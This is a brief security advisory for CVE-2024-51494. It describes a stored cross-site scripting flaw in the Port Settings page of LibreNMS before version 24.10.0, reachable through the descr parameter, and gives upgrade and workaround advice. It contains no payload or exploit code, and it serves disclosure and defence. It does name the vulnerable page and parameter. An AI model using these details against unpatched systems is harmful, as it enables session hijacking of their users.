CVE-2024-51494

Name of the Vulnerable Software and Affected Versions LibreNMS versions prior to 24.10.0

Description A Stored Cross-Site Scripting (XSS) vulnerability in the "Port Settings" page allows authenticated users to inject arbitrary JavaScript through the descr parameter when editing a device's port settings. This can lead to the execution of malicious code when the "Port Settings" page is visited, potentially compromising the user's session and allowing unauthorized actions.

Recommendations For versions prior to 24.10.0, update to version 24.10.0 or later to fix the vulnerability. As a temporary workaround, consider restricting access to the "Port Settings" page or disabling the editing of device port settings until the update is applied. Avoid using the descr parameter in the affected API endpoint until the issue is resolved.